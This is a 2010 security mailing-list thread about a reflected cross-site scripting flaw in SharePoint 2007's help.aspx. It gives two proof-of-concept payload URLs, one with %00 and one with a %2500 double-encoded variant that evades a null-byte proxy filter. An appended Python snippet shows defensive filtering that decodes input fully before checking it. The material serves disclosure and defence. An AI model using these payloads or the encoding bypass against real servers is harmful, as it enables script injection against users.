
Dailydave mailing list archives
Re: Sharepoint FTW! :>
From: NeZa <neza0x () gmail com>
Date: Fri, 30 Apr 2010 09:57:44 -0500
My proxy filters out null byte chars; however, due to SharePoint's decoding design, that helped me bypass my proxy by injecting the well-known variant %2500, so the string below also works:

http://wss1-ch-bfr/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27VivaMexico!!%27%29%3C/script%3E&tid=X

My 2 pesos!

On Thu, Apr 29, 2010 at 2:48 PM, dave <dave () immunityinc com> wrote:
Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint is one of the single largest data security risks in most large Enterprises and everyone pretty much ignores it, which is always funny. :>

http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html

This is the string that's supposed to work. Someone try it and let us all know! :>

http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X

- -dave

(Note: I'm recovering from an illness - your emails will be answered in the order they were received!)

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
--
Daniel Regalado
NeZa Rifa!!!
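As an added illustration of the bypass NeZa describes (this is not code from the thread or from any proxy product): a filter that percent-decodes a parameter once catches the %00 payload but misses the %2500 variant, while a filter that decodes to a fixed point, and treats a second decode round as suspicious in itself, catches both. The sample URLs are constructed from the two payloads quoted in the thread; `naive_filter`, `canonical_filter` and `decode_fully` are hypothetical names.

```python
from urllib.parse import urlsplit, unquote

# Constructed sample requests modelled on the two payload variants in the thread
SAMPLE_URLS = {
    "single": "http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X",
    "double": "http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%2500%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X",
    "benign": "http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml&tid=X",
}


def raw_params(url):
    """Yield (name, raw_value) pairs without decoding, so every encoding layer stays visible."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, value


def decode_fully(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (value, rounds_used).
    The bound keeps a pathological input from looping the filter forever."""
    for rounds in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value, rounds
        value = decoded
    return value, max_rounds


def naive_filter(url):
    """Single-decode NUL check like the proxy in the thread: catches %00, misses %2500."""
    return any("\x00" in unquote(raw) for _, raw in raw_params(url))


def canonical_filter(url):
    """Decode to a fixed point before inspecting. A parameter that needs more than
    one decode round is flagged on its own, since legitimate values rarely do."""
    for _, raw in raw_params(url):
        value, rounds = decode_fully(raw)
        if rounds > 1 or "\x00" in value or "<script" in value.lower():
            return True
    return False
```

Applied to the three constructed URLs, only the canonicalizing filter blocks the %2500 variant, and neither blocks the benign request.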